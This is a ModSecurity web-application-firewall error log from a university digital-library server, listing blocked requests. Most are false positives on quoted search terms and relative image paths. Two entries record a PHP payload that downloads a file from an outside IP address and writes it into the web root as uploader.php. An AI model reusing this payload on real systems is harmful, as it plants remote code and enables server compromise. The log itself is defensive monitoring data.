[Mon Aug 28 13:14:17.713567 2023] [:error] [pid 43373] [client 96.9.71.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2017.004.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOw7OcCo-f0AAKltGwAAAAAG"]
[Mon Aug 28 13:14:17.715694 2023] [:error] [pid 43479] [client 96.9.71.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTI.EMER.2016.009.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOw7OcCo-f0AAKnXEBgAAAAC"]
[Mon Aug 28 13:14:23.355709 2023] [:error] [pid 43246] [client 96.9.71.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2017.018.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOw7P8Co-f0AAKju6xcAAAAE"]
[Mon Aug 28 13:15:03.094536 2023] [:error] [pid 43373] [client 47.128.23.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ant\\xc3\\xb4nio M\\xc3\\xa1rcio Tavares Thom\\xc3\\xa9\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7Z8Co-f0AAKltGw0AAAAG"]
[Mon Aug 28 13:15:15.831364 2023] [:error] [pid 43523] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Shainin\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7c8Co-f0AAKoDxQ0AAAAJ"]
[Mon Aug 28 13:17:08.334116 2023] [:error] [pid 43523] [client 47.128.24.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Activity path planning\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw75MCo-f0AAKoDxUkAAAAJ"]
[Mon Aug 28 13:17:09.007931 2023] [:error] [pid 43523] [client 47.128.24.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Activity path planning\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw75cCo-f0AAKoDxUoAAAAJ"]
[Mon Aug 28 13:21:36.828728 2023] [:error] [pid 43574] [client 47.128.29.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Antonio Ghezzi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw88MCo-f0AAKo2RcUAAAAH"]
[Mon Aug 28 13:31:22.688985 2023] [:error] [pid 44011] [client 47.128.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Heidi Olander\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw-OsCo-f0AAKvrQrMAAAAq"]
[Mon Aug 28 13:35:14.387217 2023] [:error] [pid 43777] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxAIsCo-f0AAKsBIB0AAAAA"]
[Mon Aug 28 13:42:12.374644 2023] [:error] [pid 44190] [client 47.128.25.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/36_Jam_Belajar_Komputer.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxBxMCo-f0AAKyepRMAAAAM"]
[Mon Aug 28 13:44:47.856509 2023] [:error] [pid 44192] [client 47.128.18.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Automation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCX8Co-f0AAKygdBwAAAAP"]
[Mon Aug 28 13:45:35.281730 2023] [:error] [pid 44294] [client 47.128.21.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mathew Tsamenyi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCj8Co-f0AAK0GR9oAAAAO"]
[Mon Aug 28 13:50:37.412462 2023] [:error] [pid 44376] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxDvcCo-f0AAK1YLkkAAAAb"]
[Mon Aug 28 13:55:53.552108 2023] [:error] [pid 44483] [client 47.128.29.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Film size\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxE@cCo-f0AAK3DgnEAAAAJ"]
[Mon Aug 28 13:56:13.073889 2023] [:error] [pid 44370] [client 47.128.26.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22VEER, Van't\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxFDcCo-f0AAK1Sj4cAAAAM"]
[Mon Aug 28 14:02:56.722646 2023] [:error] [pid 44581] [client 47.128.25.144] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Marlen Promann\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxGoMCo-f0AAK4lAxwAAAAC"]
[Mon Aug 28 14:03:49.837117 2023] [:error] [pid 44630] [client 47.128.17.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Abraham Cyril Issac\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxG1cCo-f0AAK5WpAsAAAAH"]
[Mon Aug 28 14:05:54.014120 2023] [:error] [pid 44570] [client 47.128.22.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTI.EMER.2016.019.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxHUsCo-f0AAK4aMtcAAAAV"]
[Mon Aug 28 14:15:13.055388 2023] [:error] [pid 44849] [client 216.131.118.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sustainability\\x22'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJgMCo-f0AAK8xICcAAAAL"]
[Mon Aug 28 14:15:13.867510 2023] [:error] [pid 44813] [client 216.131.118.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sustainability\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJgcCo-f0AAK8N2MAAAAAI"]
[Mon Aug 28 14:16:59.883306 2023] [:error] [pid 44863] [client 47.128.21.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Opportunity\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJ68Co-f0AAK8-z14AAAAD"]
[Mon Aug 28 14:17:05.931042 2023] [:error] [pid 44869] [client 47.128.17.192] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Zero Quality Control\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJ8cCo-f0AAK9F6r8AAAAU"]
[Mon Aug 28 14:17:06.075007 2023] [:error] [pid 44869] [client 47.128.17.192] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Zero Quality Control\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJ8sCo-f0AAK9F6sAAAAAU"]
[Mon Aug 28 14:34:39.202233 2023] [:error] [pid 45115] [client 40.77.167.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Rangkaian\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxOD8Co-f0AALA7jGkAAAAK"]
[Mon Aug 28 14:36:00.015940 2023] [:error] [pid 45054] [client 47.128.24.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Risk factor dimension\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxOYMCo-f0AAK-@OuIAAAAG"]
[Mon Aug 28 14:37:16.771079 2023] [:error] [pid 45139] [client 47.128.26.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Variant design activity\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxOrMCo-f0AALBT9Y0AAAAH"]
[Mon Aug 28 14:40:41.768357 2023] [:error] [pid 45139] [client 47.128.19.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Grant Lennon\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxPecCo-f0AALBT9b8AAAAH"]
[Mon Aug 28 14:45:31.994665 2023] [:error] [pid 45356] [client 47.128.16.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Shainin KVST\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxQm8Co-f0AALEs-WUAAAAQ"]
[Mon Aug 28 14:52:04.681289 2023] [:error] [pid 45368] [client 47.128.16.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22University\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxSJMCo-f0AALE4Ul8AAAAM"]
